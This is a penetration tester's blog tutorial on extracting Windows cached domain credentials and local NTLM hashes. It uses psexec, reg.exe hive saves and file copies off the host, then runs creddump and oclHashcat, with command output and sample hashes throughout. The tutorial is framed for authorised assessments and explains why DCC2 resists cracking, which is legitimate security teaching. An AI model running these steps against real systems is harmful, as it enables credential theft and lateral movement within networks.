Windows Password Cache (mscache / mscash) v2

 

I wrote an article years ago on Windows Password Cache and this page continues to pop up in Google search results. People are still looking for information about the Windows Password Cache. Also known as mscash or mscache.  The real name is Domain Cached Credentials (DCC).  Well my previous article referenced PWDumpX v1.4 and I would like to move people away from using that tool during an assessment or penetration test. When I get Domain Administrator I may run PWDumpX just to identify for reporting purposes the systems that do not have Antivirus installed or functioning properly. You know because PWDumpX will actually return results. But that is the extent of the use of PWDumpX. When it flags the enterprise antivirus and they call me up saying they spotted me I tell them nicely that I’ve been Domain Admin all week and by the way…your file server has no antivirus.

Also years ago I wrote an article on the Windows ntbackup utility. You backup the systemstate which will create a backup of the Windows registry and place the files in C:\Windows\repair. You copy the SAM, SECURITY, and system files to your own machine and use the Creddump Python scripts to produce the same results as PWDumpX (except for the PWHistory file).

What I’m writing up is nothing new and is covered in numerous places specifically the sites listed at the end of this document. However, I’m putting this out there because it can be tough using Google to find exactly what you are asking for when it comes to Windows 7/8 and Server 2008/2012. This tutorial will use zero “hacker” tools on a target host. As with previous tutorials you will need local administrative privileges on the host. This tutorial is for pivoting within an environment by obtaining Domain credentials…hopefully Domain Admin.

There are plenty of tools and techniques that do not even require you to crack a password hash but they will not be discussed here. When conducting a penetration test there is nothing better than showing the C Level their password and what data you were able to exfiltrate using his or her credentials. Especially if the password hasn’t changed in ten years and it is the word “mike”. You know…a nickname for his first name.

Enough chit chat…Let’s do this!

Windows 2003 Server

Log into the server psexec and the local Administrator account. Obtaining the local Administrator account credentials are outside the scope of this tutorial. Use the reg.exe command to save the SAM, SECURITY, and system hive keys.

C:\tools\PSTools>psexec \\192.168.1.103 -u administrator -p password cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>reg.exe save HKLM\SAM ../repair/SAM.192.168.1.103
The operation completed successfully.

C:\WINDOWS\system32>reg.exe save HKLM\SECURITY ../repair/SECURITY.192.168.1.103
The operation completed successfully.

C:\WINDOWS\system32>reg.exe save HKLM\system ../repair/system.192.168.1.103
The operation completed successfully.

Copy the files from the remote host to your local machine with Python installed.

Z:\>copy \\192.168.1.103\c$\Windows\repair\SAM.192.168.1.103 z:\SAM.192.168.1.103
1 file(s) copied.

Z:\>copy \\192.168.1.103\c$\Windows\repair\SECURITY.192.168.1.103 z:\SECURITY.192.168.1.103
1 file(s) copied.

Z:\>copy \\192.168.1.103\c$\Windows\repair\system.192.168.1.103 z:\system.192.168.1.103
1 file(s) copied.

Now that we have the registry files we will use Creddump to extract the local user hashes and cached Domain User hashes. By default Windows 2003 Server saves the last 10 Domain users to interactively authenticate to the host. This can be through the console, Remote Desktop Protocol (RDP), or using the RunAs command. Hashes will not be cashed if you authenticate to the host through SMB.

root@xVidia:~/tools/creddump-0.3# python pwdump.py ~/cacheTest/Win2003/system.192.168.1.103 ~/cacheTest/Win2003/SAM.192.168.1.103
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbcef4ffcfe931235927d4134505691b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
edge:1001:aad3b435b51404eeaad3b435b51404ee:85055a227564439e1f1b75db8a01e135:::
james:1003:aad3b435b51404eeaad3b435b51404ee:e547aa58e70cf7e18baf88ee52601296:::

This tutorial will demonstrate using oclHashcat to crack the mscash v1 hash (Windows 2000/XP/2003).

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 1100 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m1100_a3.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: f36bc05594a9a108083d7bcd44e731e3:mscache_test1
Hash.Type......: DCC, mscash
Time.Started...: Wed Jan 22 13:47:37 2014 (8 secs)
Time.Estimated.: Tue Jan 28 08:59:42 2014 (5 days, 19 hours)
Speed.GPU.#1...: 448.5 MH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 3694657536/218340105584896 (0.00%)
Rejected.......: 0/3694657536 (0.00%)
HWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

My graphics card, a Nvidia GeForce GTX 650 Ti, can brute force one hash at 448 million a second. An eight (8) character password of upper, lower, and digits can be cracked in under 6 days. That is every combination. I point this out because we will now see how long it takes with mscash v2.

Windows 2008 Server

C:\tools\PSTools>psexec \\192.168.1.88 -u Administrator -p password cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
win-arn6ersoj2m\administrator

C:\Windows\system32>reg.exe save HKLM\SAM.192.168.1.88 SAM.192.168.1.88
The operation completed successfully.

C:\Windows\system32>reg.exe save HKLM\SECURITY.192.168.1.88 SECURITY.192.168.1.88
The operation completed successfully.

C:\Windows\system32>reg.exe save HKLM\system.192.168.1.88 system.192.168.1.88
The operation completed successfully.

Again copy them over to your local host and use Creddump to obtain the hashes. However, this time you have to use a patched version of Creddump that supports Windows Vista/7/2008

I’ve seen the updated code posted in forum posts but I’ve decided to host it on this site.

http://www.jedge.com/utilities/windows7.creddump.tar.gz

Z:\>copy \\192.168.1.88\c$\Windows\System32\SAM.192.168.1.88 z:\SAM.192.168.1.88
1 file(s) copied.

Z:\>copy \\192.168.1.88\c$\Windows\System32\SECURITY.192.168.1.88 z:\SECURITY.192.168.1.88
1 file(s) copied.

Z:\>copy \\192.168.1.88\c$\Windows\System32\system.192.168.1.88 z:\system.192.168.1.88
1 file(s) copied.

root@xVidia:~# wget http://www.jedge.com/utilities/windows7.creddump.tar.gz
--2014-01-22 13:30:16-- http://www.jedge.com/utilities/windows7.creddump.tar.gz
Resolving www.jedge.com (www.jedge.com)... 74.220.207.132
Connecting to www.jedge.com (www.jedge.com)|74.220.207.132|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39562 (39K) [application/x-gzip]
Saving to: ‘windows7.creddump.tar.gz’

100%[=======================================>] 39,562 224KB/s in 0.2s

2014-01-22 13:30:17 (224 KB/s) - ‘windows7.creddump.tar.gz’ saved [39562/39562]

root@xVidia:~# tar zxf windows7.creddump.tar.gz
root@xVidia:~# cd creddump/
root@xVidia:~/creddump# python cachedump.py
usage: cachedump.py <system hive> <security hive> <vista>
root@xVidia:~/creddump# python cachedump.py ~/cacheTest/Win2008/system ~/cacheTest/Win2008/SECURITY vista

strongpassword:62c0a5bb83721869f0104a51f34ceb03:jedge:jedge.lcl
weakpassword:517e61714cbdcfd396f4b3b2b077c921:jedge:jedge.lcl
mscache_test2:c9736046ca3f3318e7847fb4dae91aa8:jedge:jedge.lcl
jedge:2838f8db1d1eb37651d9d695a3e41c42:jedge:jedge.lcl

Now here is the part that sucks. Microsoft wised up with mscash. The hash is computed as the previous version but with an extra step added to make it computationally intense to hinder brute force attacks. From http://openwall.info/wiki/john/MSCash2

Apply PBKDF2 with SHA1 as HMAC, an iteration count of 10240, the old DCC hash as password and the Unicode username as salt in order to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the resulting 160 bits are used.

Well how much of a computational hindrance is this new step? See below…

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 2100 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m2100.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: c9736046ca3f3318e7847fb4dae91aa8:mscache_test2
Hash.Type......: DCC2, mscash2
Time.Started...: Wed Jan 22 13:50:34 2014 (12 secs)
Time.Estimated.: > 10 Years
Speed.GPU.#1...: 10872 H/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 131072/218340105584896 (0.00%)
Rejected.......: 0/131072 (0.00%)
HWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan

For mscash v1 you can do 448 million guesses a second while mscash v2 can only do 10,800 a second on the same hardware. An eight (8) character password of upper, lower, and digits takes less than six (6) days for mscash v1 and over ten (10) years for mscash v2

So what about the local hashes? They are stored using NTLMv2 and nothing has changed in Windows 7/2008. That is a problem because while the LanManager (LM) hash is in the rear-view mirror back in Windows XP/2003 land, which we know no longer exists in any environment, the NTLMv2 hash is still a piece of crap (technical term).

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 1000 ntlmv2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m1000_a3.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: bbcef4ffcfe931235927d4134505691b
Hash.Type......: NTLM
Time.Started...: Wed Jan 22 14:12:01 2014 (5 secs)
Time.Estimated.: Fri Jan 24 05:47:11 2014 (1 day, 15 hours)
Speed.GPU.#1...: 1604.3 MH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 8464105472/218340105584896 (0.00%)
Rejected.......: 0/8464105472 (0.00%)
HWMon.GPU.#1...: -1% Util, 31c Temp, 40% Fan

1.6 billion, with a B, guesses a second. You know password reuse never happens in any environment. Just like Windows XP/2003 is extinct. If you happen to compromise a target via a vulnerability…say Apache Tomcat is installed on a Windows 2008 server with default credentials, and runs as SYSTEM by default. Well…obtaining the local Administrator NTLMv2 password hash is something that would be quite useful in cracking and very possible with a cheap graphics card.

Or you could send it to cloudcracker.com and for a couple bucks you can run Trillions, yes…with a freakin “T” of password guesses against the hash in a hour.

Helpful Links because I didn’t come up with any of this myself.

http://openwall.info/wiki/john/MSCash

http://openwall.info/wiki/john/MSCash2

 http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html

http://computer-forensics.sans.org/blog/2012/02/21/protecting-privileged-domain-account-safeguarding-password-hashes

http://technet.microsoft.com/en-us/library/cc732643.aspx

https://code.google.com/p/creddump/

http://support.microsoft.com/kb/913485

 

  One Response to “Windows Password Cache (mscache / mscash) v2”

  1. […] of SHA256, not to mention Microsoft’s own Windows Vista, which internally applies 10240  iterations of HMAC-SHA1 on cached domain passwords. It might sound like comparing apples and oranges, […]

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)